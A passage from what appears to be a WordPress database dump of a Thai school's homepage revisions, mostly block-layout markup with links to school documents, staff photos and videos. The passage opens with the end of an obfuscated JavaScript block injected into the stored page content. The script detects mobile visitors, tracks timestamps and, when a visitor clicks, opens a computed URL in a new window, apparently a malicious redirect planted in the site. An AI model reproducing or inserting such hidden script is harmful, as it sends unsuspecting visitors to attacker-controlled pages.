_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:21:57','2025-07-15 07:21:57','',19,'http://watprato.ssk.in.th/?p=676',0,'revision','',0),
(677,1,'2025-07-15 14:23:21','2025-07-15 07:23:21','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f 